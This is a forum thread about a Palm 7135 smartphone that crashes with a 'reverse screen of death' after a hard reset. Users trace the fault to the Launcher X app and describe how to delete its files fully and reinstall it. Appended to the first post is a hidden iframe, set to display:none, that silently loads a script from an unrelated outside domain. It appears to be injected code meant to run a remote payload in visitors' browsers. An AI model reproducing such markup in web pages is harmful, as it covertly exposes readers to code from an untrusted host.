+ Reply to Thread

Reverse Screen of Death

I was using Kinoma Player today. Hadn't loaded anything new on to the 7135 except a new movie on the SD card that I watched successfully. I thought I had exited Kinoma and shut the clamshell. But when I came back to the 7135 about an hour later I got the black screen of discharge.

Ok, I've been through that before. Took out the battery, placed the 7135 in the cradle, got some lifesigns, put the battery back in and let it charge for a while did a hard reset.

Ok the 7135 seems fine again, but now its time to Hotsync and restore my old programs and settings.

Here's where I get stuck. I've tried twice to Hotsync. Everything seems to go fine and I get the message "You need to reset your 7135 to complete the Hotsync. Tap here."

So I tap and the soft reset goes ok. The phone side works fine. If I use the buttons to get into the address book or the datebook, or the browser, those work fine.

But the instant I tap the HOME icon to get to the desktop, Launcher X gives me the reverse screen of death and its reset time again. Soft reset gets me right back to the manual date set screen which works fine. But then as soon as I tap the home icon, reverse screen of death!

How do I get out of this vicious cycle? Is there a way to hotsync from a hard reset without loading in ALL the previous programs at once so I can try and determine what the offending program is?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Dang! 14 views and no replies? No ideas? Ok here's my idea. The 7135 itself works fine after a hard reset. So if worst came to worst I could just create a new user in the Palm Desktop for Windows and start from scratch. But then I'd lose my addresses and registered programs. Ok, I'll live without the registered programs or figure out a way to re-register without re-paying. But there MUST be a way to keep my addresses. This is really a Palm Desktop for Windows question more than a 7135 question. How do I transfer my addresses to a new user?

But that's really a last resort. I suspect Launcher X or Hackmaster or maybe Kinoma is the culprit. Can't I do a Hotsync tht let's me choose which programs to reinstall?

After the soft reset completes, go to "buttons" in Pref-PDA & set any button to "applications". Press that button & delete LX - all of it. Reset again & you should be alright.

Thanks Beryl, I'll try that! -- wait a minute. How do I get to Prefs-PDA without using the HOME button?

Administrator
    yeah , grab uninstall hack off palmgear.. it wil delete ALL of the files associated with a paretocular app! its a neat program.

i thiknk LX is your problem..

I have been having very similar problems.

Driving me nuts and chewing up lots of time.

I believe that when you do a hard reset, hotsync reloads whatever is in the palmCBbackup dir. Therefore, I suppose that you could make a copy of the dir, remove any programs in question, and progressively add them back. But, I am not sure what will happen if a conduit is invoked during hotsync for a program that has not been restored.

I have been searching for the cause of my problem for over 12 hours!! Grrrrr!

I am beginning to think that it may be a bad record in one of the DBs or a bad memory location.

Does anyone know if this thing is smart enough to do a memory check on a hard reset and x-out any bad memory?

Oh I get it. After the soft reset I can get to Buttons. Ok I'm at the home screen now without Launcher X and without the reverse screen of death. Thank you!

I initially thought that my problem was caused by LauncherX, but now, I am fairly sure that its something else.

Please let us know if you find the culprit.

Ok I deleted Launcher X and no more reverse screen of death. Thanks again.

Originally posted by jazmaan
    Ok I deleted Launcher X and no more reverse screen of death. Thanks again.
    Jaz

Your situation is the same one that I ran into a few weeks ago. Crash...then upon a hard reset, hitting the home button to get back to LX cause the reverse screen.

I have been LX and reverse screen free now for almost two weeks. I really think the cause was LX. I am bummed, because it is a really neat program.

Jeff

PS Does anyone know if "LX Browser" is part of Launcher X??
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Yes, LX Browser is part of Launcher X.

I had the same problem, and after deleting and reinstalling (actually copying back from the SD card), it now works fine. There were several other apps hanging around that I didn't restore that may have caused the problem too (Smart Phone, Wordsmith, etc, which I am replacing based on some good feedback I got here)

So rather than doing a full hot sync to get back where you started, try selectively reinstalling from the SD using backup buddy...

Scott

Yep, it is important to completely delete LX and reinstall. LXBrowser, Launcher X, Launcher X CachedIcons, Launcher X Database, Launcher X TobeDeleted all have to be deleted after you've deleted from the apps menu. After that, install from scratch.

I did that and I haven't had a reverse screen problem (except with EIS) since. I do like LX and haven't found anything as good so I'm keeping my fingers crossed that things continue this way. I've create a number of shortcuts to programs on the card that work with the native launcher just in case.